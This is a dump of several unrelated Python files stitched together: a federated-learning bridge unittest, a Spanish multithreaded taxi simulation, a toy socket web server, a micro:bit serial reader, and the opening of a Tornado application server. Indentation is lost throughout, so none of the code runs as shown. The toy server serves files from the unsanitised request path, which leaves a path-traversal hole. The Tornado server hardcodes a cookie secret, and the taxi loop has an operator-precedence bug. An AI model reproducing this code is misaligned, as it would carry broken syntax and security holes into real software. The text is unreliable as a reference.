# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import unittest
import threading
import tensorflow.compat.v1 as tf
import numpy as np
import fedlearner as fl
from fedlearner.common import common_pb2 as common_pb
from fedlearner.common import trainer_worker_service_pb2 as tws_pb
def fake_start_message(seq_num, iter_id):
return tws_pb.TrainerWorkerMessage(
seq_num=seq_num,
start=tws_pb.StartMessage(iter_id=iter_id)
)
class TestBridge(unittest.TestCase):
def test_bridge(self):
bridge1 = fl.trainer.bridge.Bridge('leader', 50051, 'localhost:50052')
bridge2 = fl.trainer.bridge.Bridge('follower', 50052, 'localhost:50051')
t = threading.Thread(target=lambda _: bridge1.connect(), args=(None,))
t.start()
bridge2.connect()
t.join()
g1 = tf.Graph()
with g1.as_default():
x = tf.constant(3.0, name='x')
y = tf.constant(2.0, name='y')
send_x = bridge1.send_op('x', x)
send_y = bridge1.send_op('y', y)
g2 = tf.Graph()
with g2.as_default():
recv_x = bridge2.receive_op('x', dtype=tf.float32)
recv_y = bridge2.receive_op('y', dtype=tf.float32)
out = recv_x - recv_y
bridge1.start(123)
bridge2.start(123)
with tf.Session(graph=g1) as sess:
sess.run([send_x, send_y])
with tf.Session(graph=g2) as sess:
self.assertEqual(sess.run(out), 1.0)
bridge1.commit()
bridge2.commit()
bridge2.terminate()
bridge1.terminate()
def test_seq_and_ack(self):
bridge1 = fl.trainer.bridge.Bridge('leader', 40051, 'localhost:40052')
bridge2 = fl.trainer.bridge.Bridge('follower', 40052, 'localhost:40051')
t = threading.Thread(target=lambda _: bridge1.connect(), args=(None,))
t.start()
bridge2.connect()
t.join()
client1 = bridge1._client
msg = fake_start_message(0, 0)
rsp = client1.Transmit(msg)
self.assertEqual(rsp.status.code, common_pb.STATUS_SUCCESS)
rsp = client1.Transmit(msg)
self.assertEqual(rsp.status.code, common_pb.STATUS_MESSAGE_DUPLICATED)
msg = fake_start_message(3, 1)
rsp = client1.Transmit(msg)
self.assertEqual(rsp.status.code, common_pb.STATUS_MESSAGE_MISSING)
bridge2.terminate()
bridge1.terminate()
if __name__ == '__main__':
unittest.main()
|
taxis.py
|
from threading import Thread, Lock
from math import sqrt
from time import sleep
import random
from sys import argv
class Celda:
def __init__(self):
# The taxi currently occupying this cell
self.taxi = None
# List of clients in this cell
self.clientes = []
# Mutex protecting this cell
self.mutex = Lock()
def add_taxi(self, taxi):
"""Places the given taxi in this cell."""
self.taxi = taxi
def remove_taxi(self):
"""Removes the taxi currently in this cell."""
self.taxi = None
def add_cliente(self, cliente):
"""Adds the given client to this cell."""
self.clientes.append(cliente)
def pop_cliente(self):
"""Removes and returns one of the clients in this cell."""
return self.clientes.pop(0)
def remove_cliente(self, cliente):
"""Removes the given client from this cell."""
self.clientes.remove(cliente)
def lock_mutex(self):
"""Acquires this cell's mutex."""
self.mutex.acquire()
def release_mutex(self):
"""Releases this cell's mutex."""
self.mutex.release()
class Cliente:
def __init__(self, id_):
# Client identifier
self.id = id_
# Not yet picked up by any taxi
self.taken = 0
# The client is alive
self.vivo = 1
# Tuple with the origin coordinates
self.origen = (0, 0)
# Tuple with the destination coordinates
self.destino = (0, 0)
def vive(self):
"""Ciclo de vida del cliente."""
# Bloquea el mutex global
lock.acquire()
# Genera posiciones aleatorias de origen y destino
self.origen = random_position()
self.destino = random_position()
# Si el origen y el destino son iguales, vuelve a generar el destino hasta que sean distintos
while self.origen == self.destino:
self.destino = random_position()
# Se mete en la matriz
self.entrar()
# Pide un taxi para que le lleve a su destino
if verbose_mode != 2:
self.pedir_taxi()
# Libera el mutex global
lock.release()
# Mientras este vivo
while self.vivo == 1:
# Mientras no haya sido recogido ni haya llegado a su destino
while self.taken == 0 and self.ha_llegado() == 0:
sleep(0.6)
# Obtiene las coordenadas de las celdas adyacentes
celdas_ady = get_celdas_ady(self.origen[0], self.origen[1])
# Bloquea el mutex en las celdas adyacentes
for (x, y) in celdas_ady:
matriz[x][y].lock_mutex()
# Si no ha sido recogido por ningun taxi mientras bloqueaba los mutex
if self.taken == 0:
# Sale de su celda
self.salir()
# Se calcula el siguiente movimiento de forma aleatoria
self.origen = random_move(celdas_ady)
# Se mueve a la nueva posicion
self.entrar()
# Si está en modo verbose, imprime por pantalla el estado del cliente
if verbose_mode == 1:
self.mostrar_estado()
# Libera el mutex en las celdas adyacentes
for (x, y) in celdas_ady:
matriz[x][y].release_mutex()
# Si llega a pie al destino
if self.ha_llegado() == 1:
print("Soy {0} y he llegado a pie mi destino ({1}, {2}). ".format(str(self.id), str(self.destino[0]),
str(self.destino[1])))
# Acquire the global mutex
lock.acquire()
# Generate new random origin and destination positions
self.origen = random_position()
self.destino = random_position()
# If origin and destination coincide, regenerate the destination until they differ
while self.origen == self.destino:
self.destino = random_position()
global num_clientes
# Increment the client counter
num_clientes += 1
self.id = "Cliente " + str(num_clientes - 1)
# Enter the grid
self.entrar()
if verbose_mode != 2:
self.pedir_taxi()
# Release the global mutex
lock.release()
def pedir_taxi(self):
"""Imprime por pantalla la posicion y destino del cliente y pide un taxi."""
print("Soy {0} y estoy en ({1}, {2}), mi destino es ({3}, {4}). TAXIII!!!".format(str(self.id),
str(self.origen[0]),
str(self.origen[1]),
str(self.destino[0]),
str(self.destino[1])))
def mostrar_estado(self):
"""Imprime por pantalla la posicion y destino del cliente."""
print("Soy {0} y estoy en ({1}, {2}), mi destino es ({3}, {4}).".format(str(self.id), str(self.origen[0]),
str(self.origen[1]),
str(self.destino[0]),
str(self.destino[1])))
def ha_llegado(self):
"""Devuelve 1 si el cliente ha llegado al destino por su propio pie."""
return 1 if (self.origen[0] == self.destino[0] and self.origen[1] == self.destino[1]) else 0
def salir(self):
"""El cliente sale de la celda."""
# Obtiene la lista de clientes que hay en la celda
matriz[self.origen[0]][self.origen[1]].remove_cliente(self)
def entrar(self):
"""El cliente entra en la celda."""
matriz[self.origen[0]][self.origen[1]].add_cliente(self)
class Taxi:
def __init__(self, id_):
self.id = id_
self.busy = 0
self.origen = (0, 0)
self.destino = (0, 0)
self.cliente = None
self.num_clientes = 0
def empieza_servicio(self):
"""Ciclo de vida del taxi. """
# Genera una posicion aleatoria de origen
origen = random_position()
# Bloquea el mutex global
lock.acquire()
# Vuelve a generar la posicion de origen mientras en la generada haya ya un taxi
while hay_taxi(origen):
origen = random_position()
# Toma como origen una posicion vacia
self.origen = origen
# Se mete en dicha posicion
self.add_taxi()
# Libera el mutex global
lock.release()
global game_end
# Mientras no se haya terminado el juego
while game_end == 0:
# Obtiene las posiciones de las celdas adyacentes disponibles
pos_coord = self.get_pos_coord()
# Bloquea el mutex de dichas celdas adyacentes
for (x, y) in pos_coord:
matriz[x][y].lock_mutex()
# Si hay un cliente en su celda, lo recoge
if self.hay_cliente():
self.coger_cliente()
# Libera los mutex
for (x, y) in pos_coord:
matriz[x][y].release_mutex()
# Mientras esta libre y el juego no ha terminado
while self.busy == 0 and game_end == 0:
sleep(0.1)
# Obtiene las posiciones de las celdas adyacentes disponibles
pos_coord = self.get_pos_coord()
# Bloquea el mutex de dichas celdas adyacentes
for (x, y) in pos_coord:
matriz[x][y].lock_mutex()
# Obtiene las coordenadas de uno de los clientes adyacentes, (-1, -1) si no hay
adj_client = is_adjacent_client(pos_coord)
# Si hay algun cliente en las adyacentes, toma la posicion de este para moverse a su celda
if adj_client != (-1, -1):
new_x = adj_client[0]
new_y = adj_client[1]
# Si no, se dirige a una al azar de las disponibles
else:
new = random.choice(pos_coord)
new_x = new[0]
new_y = new[1]
# Sale de la celda
self.remove_taxi()
# Guarda la posicion de la celda a la que se va a mover
self.origen = (new_x, new_y)
# Se mete en la celda
self.add_taxi()
# Si hay un cliente en la celda, lo recoge
if self.hay_cliente():
self.coger_cliente()
else:
if verbose_mode == 1:
self.mostrar_estado()
# Libera los mutex
for (x, y) in pos_coord:
matriz[x][y].release_mutex()
# Mientras esta ocupado
while self.busy == 1 and game_end == 0:
sleep(0.1)
# Mientras no haya llegado al origen
while self.origen[0] != self.destino[0] or self.origen[1] != self.destino[1] and game_end == 0:
# Get the positions of the available adjacent cells
next_coord = self.get_pos_coord()
# Lock the mutex of those adjacent cells
for (x, y) in next_coord:
matriz[x][y].lock_mutex()
# Sort the coordinates by proximity to the destination
next_move = sorted(next_coord, key=self.euclidean_distance)[0]
# Leave the cell
self.remove_taxi()
# Store the position of the cell it is going to move to
self.origen = (next_move[0], next_move[1])
# Enter the cell
self.add_taxi()
if verbose_mode == 1:
self.mostrar_estado_trayecto()
# Release the mutexes
for (x, y) in next_coord:
matriz[x][y].release_mutex()
# If it reaches the destination
if self.origen[0] == self.destino[0] and self.origen[1] == self.destino[1]:
# It becomes free again
self.busy = 0
# Add one client to the counter
self.num_clientes += 1
lock.acquire()
# Print that it has dropped off the client and the number of rides completed
out = "Soy " + str(self.id) + " y dejo a " + str(self.cliente.id) + " en (" + str(self.origen[0]) \
+ ", " + str(self.origen[1]) + "), he realizado "
if self.num_clientes != 1:
out += str(self.num_clientes) + " carreras. "
else:
out += " 1 carrera."
# It no longer carries any client
self.cliente = None
print(out)
# If it has served 10 clients
if self.num_clientes == 10:
# Announce that it has won
print("SE ACABÓ EL JUEGO. EL GANADOR ES {0}. ".format(str(self.id)))
# End the game
game_end = 1
# If it dropped off a client but has not won yet, create a new one
else:
crear_cliente()
lock.release()
def euclidean_distance(self, celda):
"""Devuelve la distancia euclidea entre el destino y la celda pasada como argumento."""
return sqrt((self.destino[0] - celda[0]) ** 2 + (self.destino[1] - celda[1]) ** 2)
def hay_cliente(self):
"""Devuelve 1 si hay un cliente en la celda del taxi, 0 en caso contrario."""
return 1 if len(matriz[self.origen[0]][self.origen[1]].clientes) > 0 else 0
def saludar(self):
"""Imprime por pantalla su identificador y su posicion."""
print("Soy " + str(self.id) + " y estoy en (" + str(self.origen[0]) + ", " + str(self.origen[1]) + "). ")
def add_taxi(self):
"""Se mete en su nueva celda."""
matriz[self.origen[0]][self.origen[1]].add_taxi(self)
def remove_taxi(self):
"""Sale de su celda."""
matriz[self.origen[0]][self.origen[1]].remove_taxi()
def remove_cliente(self):
"""Saca un cliente de su celda."""
return matriz[self.origen[0]][self.origen[1]].pop_cliente()
def get_pos_coord(self):
"""Devuelve las celdas adyacentes a las que sea posible moverse."""
# Obtiene todas las celdas adyacentes
celdas_ady = get_celdas_ady(self.origen[0], self.origen[1])
ret = []
# Guarda en la lista aquellas que no tienen un taxi y la celda actual
for (x, y) in celdas_ady:
if matriz[x][y].taxi is None or matriz[x][y].taxi == self:
ret.append((x, y))
return ret
def coger_cliente(self):
"""Recoge a un cliente de su celda, sacando a este de su celda y marcandolo como no vivo. El taxi pasa a estar
ocupado y toma como destino el destino del cliente. Imprime por pantalla que ha recogido al cliente."""
# Esta ocupado
self.busy = 1
# Saca al cliente de la celda
cl = self.remove_cliente()
# El cliente ha sido recogido
cl.taken = 1
# El cliente deja de estar vivo
cl.vivo = 0
# Guarda al cliente
self.cliente = cl
# Adquiere el destino del cliente
self.destino = (cl.destino[0], cl.destino[1])
# Informa por pantalla
print("Soy {0} y cogí a {5} en ({1}, {2}), le llevo a ({3}, {4})".format(str(self.id), str(self.origen[0]),
str(self.origen[1]),
str(self.destino[0]),
str(self.destino[1]), str(cl.id)))
def mostrar_estado_trayecto(self):
"""Imprime por pantalla la posicion del taxi y su destino."""
print("Soy {0} y estoy en ({1}, {2}), llevo a {5} a ({3}, {4})"
.format(str(self.id), str(self.origen[0]), str(self.origen[1]), str(self.destino[0]),
str(self.destino[1]), str(self.cliente.id)))
def mostrar_estado(self):
"""Imprime por pantalla la posicion del taxi."""
print("Soy {0} y estoy en ({1}, {2}).".format(str(self.id), str(self.origen[0]), str(self.origen[1])))
def is_adjacent_client(pos_coord):
"""Devuelve las coordenadas de un cliente, si es que hay uno en las coordenadas adyacentes, o (-1, -1) en caso
contrario."""
for (x, y) in pos_coord:
if len(matriz[x][y].clientes) > 0:
return x, y
return -1, -1
def random_move(moves):
"""Devuelve una celda aleatoria de las pasadas como parametro."""
return moves[random.randint(0, len(moves) - 1)]
def crear_cliente():
"""Crea un nuevo cliente."""
# Incrementa el numero de cliente para crear el identificador
global num_clientes
num_clientes += 1
id_ = "Cliente " + str(num_clientes - 1)
Thread(target=constructor_cliente, args=(id_,)).start()
def hay_taxi(coord):
"""Devuelve 1 si hay un taxi en la posicion dada, 0 en caso contrario."""
return 1 if matriz[coord[0]][coord[1]].taxi is not None else 0
def get_adj_coord(coord):
"""Devuelve las posiciones adyacentes en el eje dado."""
# Si no esta en los bordes
if coord != 0 and coord != len(matriz) - 1:
# Tiene 3 posibles movimientos
return [coord - 1, coord, coord + 1]
# Si esta a la izquierda
elif coord == 0:
# Tiene 2 posibles movimientos
return [coord, coord + 1]
# Si esta a la derecha
else:
# Tiene 2 posibles movimientos
return [coord - 1, coord]
def get_celdas_ady(x, y):
"""Devuelve una lista de tuplas con las celdas adyacentes a las coordenadas dadas."""
return [(a, b) for a in get_adj_coord(x) for b in get_adj_coord(y)]
def random_position():
"""Devuelve una tupla con una posicion aleatoria del entorno."""
return random.randint(0, len(matriz) - 1), random.randint(0, len(matriz) - 1)
def constructor_cliente(id_):
"""Crea un cliente con el id pasado por parametro y le da vida"""
c_ = Cliente(id_)
c_.vive()
def constructor_taxi(id_):
"""Crea un taxi con el id pasado por parametro y lo pone a trabajar"""
t_ = Taxi(id_)
t_.empieza_servicio()
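# Illustrative sketch (an assumption, not part of the original program): what the adjacency
# helpers above return for a 50x50 grid. The helper below builds a throwaway grid so it can
# be run standalone.
def _demo_adjacency():
    global matriz
    matriz = [[Celda() for _ in range(50)] for _ in range(50)]
    assert get_adj_coord(0) == [0, 1]
    assert get_adj_coord(10) == [9, 10, 11]
    assert get_celdas_ady(0, 0) == [(0, 0), (0, 1), (1, 0), (1, 1)]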
if __name__ == '__main__':
# Create the mutex
lock = Lock()
# Dimension of the grid
m = 50
# Initialize the grid
matriz = [[Celda() for x in range(m)] for y in range(m)]
# Variable that controls the end of the game
game_end = 0
# List holding the taxis
lista_taxis = []
# List holding the clients
lista_clientes = []
# Verbose mode, which prints everything that happens in the environment
verbose_mode = 0
# Enabled when the program is run with a specific argument
if len(argv) > 1:
if argv[1] == "--verbose" or argv[1] == "-v":
verbose_mode = 1
elif argv[1] == "--simple" or argv[1] == "-s":
verbose_mode = 2
print("\n###### EL JUEGO DEL TAXISTA ######\n")
# Ask for the number of taxis
num_taxis = input('¿Cuántos taxis quieres que haya? \n')
# While the input is not a digit
while not num_taxis.isdigit():
# report the error
print("El caracter introducido no es un número entero positivo, vuelve a intentarlo. ")
# and ask again
num_taxis = input('¿Cuántos taxis quieres que haya? \n')
num_taxis = int(num_taxis)
# Ask for the number of clients
num_clientes = input('¿Cuántos clientes quieres que haya? \n')
while not num_clientes.isdigit():
print("El caracter introducido no es un número entero positivo, vuelve a intentarlo. ")
num_clientes = input('¿Cuántos clientes quieres que haya? \n')
num_clientes = int(num_clientes)
print()
# Create the Client threads
for c in range(num_clientes):
id_c = "Cliente " + str(c)
# Create the thread with the client
lista_clientes.append(Thread(target=constructor_cliente, args=(id_c,)))
# Create the Taxi threads
for t in range(num_taxis):
id_t = "Taxi " + str(t)
# Create the thread with the taxi
lista_taxis.append(Thread(target=constructor_taxi, args=(id_t,)))
for clien in lista_clientes:
# Declare the threads as daemons
clien.daemon = True
# and start them
clien.start()
for tax in lista_taxis:
# Declare the threads as daemons
tax.daemon = True
# and start them
tax.start()
# The program keeps running until this variable changes
while game_end == 0:
pass
|
basic02.py
|
"""
Web server that returns dynamic pages: it opens the page specified by the requested path.
"""
import socket, threading, multiprocessing,gevent
from gevent import monkey
monkey.patch_all()
class HTTPServer(object):
def __init__(self):
server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Socket tuning: after a server releases a port it normally waits about two minutes before the
# port can be reused; SO_REUSEADDR lets the port be reused immediately after release.
# Arg 1: the level the option lives at; SOL_SOCKET is the basic socket level
# Arg 2: the option to set, here the address-reuse option
# Arg 3: enable or disable, 1/0
server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# Bind
server_socket.bind(('', 9999))
# Listen; set the backlog length for connections that have completed the three-way handshake
server_socket.listen(128)
self.server_socket = server_socket
def request_handler(self, client_socket):
""" 为每个客户进行服务"""
# 接收每个客户的请求报文,通过recv_data判断客户端是不是已经断开连接
recv_data = client_socket.recv(4096)
if not recv_data:
print("客户端已经断开连接.")
client_socket.close()
return
# Split the request message and extract the request path from the request line, e.g. /a.html
request_str_data = recv_data.decode()
data_list = request_str_data.split("\r\n")
path_info = data_list[0].split(" ")[1]
print(" 用户的请求路径为: %s" % path_info)
if path_info == "/":
path_info = "/a.html"
try:
file = open("./static" + path_info, "rb")
file_data = file.read()
file.close()
except Exception as e:
# Reply to the client with a response message; \r\n is the line terminator
response_line = "HTTP/1.1 404 Not Found\r\n"
# Response headers
response_header = "Server: PythonWebServer2.0\r\n"
# Response body
response_body = "Error!!!!!!"
# Assemble the response message
response_data = response_line + response_header + "\r\n" + response_body
# Send the message; it cannot be sent as a str, so it must be encoded
client_socket.send(response_data.encode())
else:
# Reply to the client with a response message; \r\n is the line terminator
response_line = "HTTP/1.1 200 OK\r\n"
# Response headers
response_header = "Server: PythonWebServer2.0\r\n"
# Response body
response_body = file_data
# Assemble the response message
response_data = (response_line + response_header + "\r\n").encode() + response_body
# Send the message; the body is already bytes, so no further encode is needed
client_socket.send(response_data)
# Close the socket
client_socket.close()
def start(self):
while True:
# Take a client socket off the accept queue and serve it
client_socket, client_addr = self.server_socket.accept()
"""
线程处理每一个客户端的accept,线程你给的变量等是共享的
所以传入的client_socket和主线程的client_socket是同一个东西,关一个即可
"""
# thread = threading.Thread(target=request_handler, args=(client_socket,))
# thread.start()
"""
线程处理每一个客户端的accept
在进程copy一份client_socket之后,关闭主进程的client_socket
由于主进程和子进程互相独立,copy关系,两个都关闭网页左上角才不会一直转
"""
# proc = multiprocessing.Process(target=self.request_handler, args=(client_socket,))
# proc.start()
# client_socket.close()
"""
The gevent coroutine approach: join/joinAll only keep the main thread alive, and since we are inside an endless while True loop here, no join is needed.
"""
gevent.spawn(self.request_handler, client_socket)
def testWeb():
http_server = HTTPServer()
http_server.start()
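# Illustrative test sketch (an assumption, not part of this module): a tiny client that fetches
# a page from the server above once it is running on port 9999. The path /a.html mirrors the
# default used in request_handler.
def fetch_demo_page(path="/a.html", host="127.0.0.1", port=9999):
    import urllib.request
    with urllib.request.urlopen("http://{}:{}{}".format(host, port, path)) as resp:
        return resp.status, resp.read()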
def main():
testWeb()
if __name__ == '__main__':
main()
|
mbhandler.py
|
import serial
import serial.tools.list_ports
import threading
import warnings
import queue as q
class NoMicrobitError(Exception):
def __init__(self, message):
# Call the base class constructor with the parameters it needs
super(Exception, self).__init__(message)
BAUD = 115200
RUNNING = True
DEBUG = False
# Taken (and adapted) from https://github.com/ntoll/microrepl/blob/master/microrepl.py
def get_port():
ports = list(serial.tools.list_ports.comports())
for port, desc, opts in ports:
if 'VID:PID=' in opts:
s = opts.find('VID:PID=') + 8
e = opts.find(' ',s)
vid, pid = opts[s:e].split(':')
vid, pid = int(vid, 16), int(pid, 16)
if vid == 0x0D28 and pid == 0x0204:
return port
raise NoMicrobitError("No microbits found")
return None
def __default_worker():
port = get_port()
s = serial.Serial(port)
s.baudrate = BAUD
s.parity = serial.PARITY_NONE
s.databits = serial.EIGHTBITS
s.stopbits = serial.STOPBITS_ONE
state = {'a': False, 'b': False}
while True:
if not RUNNING:
break
try:
data = s.readline().decode("ascii").rstrip()
except:
continue
if data == 'None':
continue
try:
v = int(data.split(':')[0],16)
except:
continue
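# The serial line is assumed to carry a hex-encoded integer before the ':' that packs the
# reading as: bit 0 = button B, bit 1 = button A, then three signed 8-bit bytes for the
# z, y and x accelerometer axes (inferred from the unpacking below, not documented here).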
b = (v & 1 == 1)
v >>= 1
a = (v & 1 == 1)
v >>= 1
z = v & 255
v >>= 8
y = v & 255
v >>= 8
x = v & 255
if x > 127:
x -= 256
if y > 127:
y -= 256
if z > 127:
z -= 256
x *= -1
y *= -1
name = data.split(':')[1]
e = {
'name': name,
'accelerometer': {
'x': x,
'y': y,
'z': z,
},
'button_a': {
'pressed': a,
'down': a and not state['a'],
'up': not a and state['a']
},
'button_b': {
'pressed': b,
'down': b and not state['b'],
'up': not b and state['b']
}
}
state['a'] = a
state['b'] = b
if DEBUG:
print(e)
post(e)
s.close()
def __raw_worker():
port = get_port()
s = serial.Serial(port)
s.baudrate = BAUD
s.parity = serial.PARITY_NONE
s.databits = serial.EIGHTBITS
s.stopbits = serial.STOPBITS_ONE
while True:
if not RUNNING:
break
try:
data = s.readline().decode("ascii").rstrip()
except:
continue
if data == 'None':
continue
if DEBUG:
print(data)
post(data)
s.close()
def __pygame_init():
global pygame
import pygame
global post
global MICROBITEVENT
MICROBITEVENT = pygame.USEREVENT
pygame.USEREVENT += 1
post = __pygame_post
def __pygame_post(e):
if isinstance(e,str):
e = {'message': e}
ev = pygame.event.Event(MICROBITEVENT,**e)
try:
pygame.event.post(ev)
except: # what's the error here if the queue is full/non-existent?
pass
def __queue_init():
global post
global queue
queue = q.Queue()
post = __queue_post
def __queue_post(e):
try:
queue.put(e)
except q.Full:
pass
def init(**kwargs):
global worker
global DEBUG
method = "queue"
output = "default"
worker = __default_worker
if 'method' in kwargs:
method = kwargs['method']
if 'output' in kwargs:
output = kwargs['output']
if 'debug' in kwargs:
DEBUG = True
if output == "raw":
worker = __raw_worker
if method == "pygame":
__pygame_init()
else:
__queue_init()
t = threading.Thread(target=worker)
t.daemon = True
t.start()
def quit():
global RUNNING
RUNNING = False
# Should we clean up after ourselves?
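# Illustrative usage sketch (an assumption, not part of this module): polling micro:bit events
# from the queue backend configured by init(). Runs only when this file is executed directly.
if __name__ == "__main__":
    init(method="queue", output="default")
    while RUNNING:
        event = queue.get()
        print(event['name'], event['accelerometer'], event['button_a']['pressed'])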
|
TheasServer.py
|
#!/usr/bin/env python
import sys
import os
import platform
import datetime
import threading
import time
import signal
import uuid
import binascii
import traceback
import string
import json
import tornado.web
import tornado.websocket
import tornado.ioloop
import tornado.options
import tornado.httpserver
from multiprocessing import Lock
from concurrent.futures import ThreadPoolExecutor
from tornado.concurrent import run_on_executor
import theas
import _mssql
import logging
import TheasCustom
import urllib.parse as urlparse
if platform.system() == 'Windows':
from TheasServerSvc import write_winlog
else:
def write_winlog(*args):
if len(args) >= 2:
print(args[1])
else:
print(args[0])
# import asyncio
# import msvcrt
# import mimetypes
# import os
# import time
# import gc
# from pympler import muppy, summary
# from jinja2 import Template, Untornado.options.defined
# from jinja2.environment import Environment
# from tornado.stack_context import ExceptionStackContext
# import contextlib
# import decimal
# import pymssql
# from tornado import gen, concurrent, ioloop
# from multiprocessing import Process, Lock
# from tornado.options import tornado.options.define, options
# import tornado.options
__author__ = 'DavidRueter'
"""
Theas web application server.
Author: David Rueter ([email protected])
Date: 5/9/2016
Description : Wrapper to run TheasServer web server as a Windows service.
Home: https://github.com/davidrueter/Theas
Usage : TheasServerSvc.exe
See settings.cfg for additional options. Options may be set in the config file, or may be passed in
on the command line.
It is recommended that you rename the TheasServerSvc.exe to something specific to your application.
May be run as a Windows service. See TheasServerSvc.py and setup.py for more information.
"""
# @contextlib.contextmanager
# def catch_async_exceptions(type, value, traceback):
# try:
# print('ERROR: ' + str(value.args[0][1]))
# #yield
# except Exception:
# print('ERROR: ' + str(value.args[0][1]))
THEAS_VERSION = '0.90.1.50' # from version.cfg
SESSION_MAX_IDLE = 60 # Max idle time (in minutes) before TheasServer session is terminated
REMOVE_EXPIRED_THREAD_SLEEP = 60 # Seconds to sleep in between polls in background thread to check for expired sessions, 0 to disable
LOGGING_LEVEL = 1 # Enable all logging. 0 to disable all, other value to specify threshold.
LOGIN_RESOURCE_CODE = 'login'
LOGIN_AUTO_USER_TOKEN = None
DEFAULT_RESOURCE_CODE = None
FULL_SQL_IS_OK_CHECK = False
USE_WORKER_THREADS = False
MAX_WORKERS = 30
USE_SESSION_COOKIE = True
REMEMBER_USER_TOKEN = False
FORCE_REDIR_AFTER_POST = True
USE_SECURE_COOKIES = True
SESSION_HEADER_NAME = 'X-Theas-Sesstoken'
SESSION_COOKIE_NAME = 'theas:th:ST'
USER_COOKIE_NAME = 'theas:th:UserToken'
COOKIE_SECRET = 'tF7nGhE6nIcPMTvGPHlbAk5NIoCOrKnlHIfPQyej6Ay='
# NOTE:
# 1) This is the maximum number of threads per thread pool, not for the whole application. In practice each
# class that uses background threads via the @run_on_executor decorator has its own thread pool. Thus the
# total number of threads in the application will be {number of classes} x MAX_WORKERS (plus any other threads
# used by the application).
# 2) Counter-intuitively, idle threads are not reused until MAX_WORKERS threads have been created. For example,
# suppose MAX_WORKERS = 30. When the application is started and the first request comes in, a new thread
# would be created. The request is completed, the thread is idle. Then a second request comes in. A thread
# would still be created (now two threads), and so on, until all 30 threads in the pool have been created. See
# Tornado's module thread.py, class ThreadPoolExecutor._adjust_thread_count, and in particular, this comment:
# # TODO(bquinlan): Should avoid creating new threads if there are more
# # idle threads than items in the work queue.
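# Illustrative sketch (an assumption, not part of Theas): the per-class thread pool pattern the
# note above refers to, using tornado's @run_on_executor decorator. The caller awaits the Future
# this method returns on the IOLoop.
class _ExampleExecutorUser:
    executor = ThreadPoolExecutor(max_workers=MAX_WORKERS)  # one pool per class

    @run_on_executor
    def blocking_work(self, seconds=1):
        time.sleep(seconds)  # runs on a pool thread, not on the IOLoop
        return seconds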
G_sessions = None # Global list of sessions
G_cached_resources = None # Global list of cached resources
G_program_options = None
G_server_is_running = False
G_break_handler = None
def format_error(e):
err_msg = ''
err_msg_dblib = ''
err_msg_friendly = ''
err_msg_template = ''
if isinstance(e, str):
err_msg = e
else:
err_msg = e.text.decode('ascii')
p = err_msg.find('DB-Lib error')
if p >= 0:
# The error message from pymssql (annoyingly) appends:
# DB-Lib error message 20018, severity 16: General SQL Server error: Check messages from the SQL Server
# Strip that out.
err_msg_dblib = err_msg[p:]
err_msg = err_msg[:p]
# By convention, if err_msg contains a pipe character | we take the first part of this message
# to be the "technical" message, and the second part to be the "friendly" message, suitable for
# display to an end user.
# Additionally, a second pipe character | may be present, marking the end of the "friendly" message,
# after which is a flag 1 or 0 to indicate whether the "technical" message should be displayed.
err_msgs = err_msg.split('|')
err_msg_tech = ''
err_msg_friendly = ''
err_msg_showtech = '1'
err_msg_title = ''
if len(err_msgs) == 1:
err_msg_tech = err_msg
err_msg_showtech = '1'
else:
err_msg_tech = err_msgs[0]
err_msg_friendly = err_msgs[1]
if len(err_msgs) > 2:
err_msg_showtech = '1' if err_msgs[2] == '1' else '0'
if len(err_msgs) > 3:
err_msg_title = err_msgs[3]
err_msg = ''
err_msg_storedproc = None
if hasattr(e, 'procname'):
err_msg_storedproc = e.procname.decode('ascii')
# Parenthesize each conditional so the fragments are appended independently (the original
# chained expression swallowed later fragments), and coerce numeric attributes to str.
err_msg_tech += \
('Exception type ' + type(e).__name__ + '\n' if type(e).__name__ != 'str' else '') + \
('Stored procedure ' + err_msg_storedproc if err_msg_storedproc is not None else '') + \
(' error ' + str(e.number) if hasattr(e, 'number') else '') + \
(' at line ' + str(e.line) if hasattr(e, 'line') else '')
include_dblib_error = False
if include_dblib_error:
err_msg_tech = err_msg_tech + '\n' + err_msg_dblib
err_msg = '{}|{}|{}|{}'.format(err_msg_tech, err_msg_friendly, err_msg_showtech, err_msg_title)
return err_msg
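# Illustrative sketch (an assumption, not part of Theas): how the pipe-delimited convention
# described above round-trips through format_error() for a plain string input.
def _demo_format_error():
    msg = format_error('Invalid widget id|Please pick a widget from the list|0|Widget error')
    tech, friendly, showtech, title = msg.split('|')
    return tech, friendly, showtech, title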
class BreakHandler:
"""
Trap CTRL-C, set a flag, and keep going. This is very useful for
gracefully exiting database loops while simulating transactions.
To use this, make an instance and then enable it. You can check
whether a break was trapped using the trapped property.
# Create and enable a break handler.
ih = BreakHandler()
ih.enable()
for x in big_set:
complex_operation_1()
complex_operation_2()
complex_operation_3()
# Check whether there was a break.
if ih.trapped:
# Stop the loop.
break
ih.disable()
# Back to usual operation...
from: http://stacyprowell.com/blog/2009/03/trapping-ctrlc-in-python/
Also, consider:
# see: https://docs.microsoft.com/en-us/windows/console/registering-a-control-handler-function
import win32api
def ctrlHandler(ctrlType):
return True
win32api.SetConsoleCtrlHandler(ctrlHandler, True)
"""
def __init__(self, emphatic=9):
"""
Create a new break handler.
@param emphatic: This is the number of times that the user must
press break to *disable* the handler. If you press
break this number of times, the handler is automagically
disabled, and one more break will trigger an old
style keyboard interrupt. The default is nine. This
is a Good Idea, since if you happen to lose your
connection to the handler you can *still* disable it.
"""
self._count = 0
self._enabled = False
self._emphatic = emphatic
self._oldhandler = None
return
def _reset(self):
"""
Reset the trapped status and count. You should not need to use this
directly; instead you can disable the handler and then re-enable it.
This is better, in case someone presses CTRL-C during this operation.
"""
self._count = 0
return
def enable(self):
"""
Enable trapping of the break. This action also resets the
handler count and trapped properties.
"""
if not self._enabled:
self._reset()
self._enabled = True
self._oldhandler = signal.signal(signal.SIGINT, self)
return
def disable(self):
"""
Disable trapping the break. You can check whether a break
was trapped using the count and trapped properties.
"""
if self._enabled:
self._enabled = False
signal.signal(signal.SIGINT, self._oldhandler)
self._oldhandler = None
return
def __call__(self, signame, sf):
"""
A break just occurred. Save information about it and keep
going.
"""
self._count += 1
print('Ctrl-C Pressed (caught by BreakHandler)')
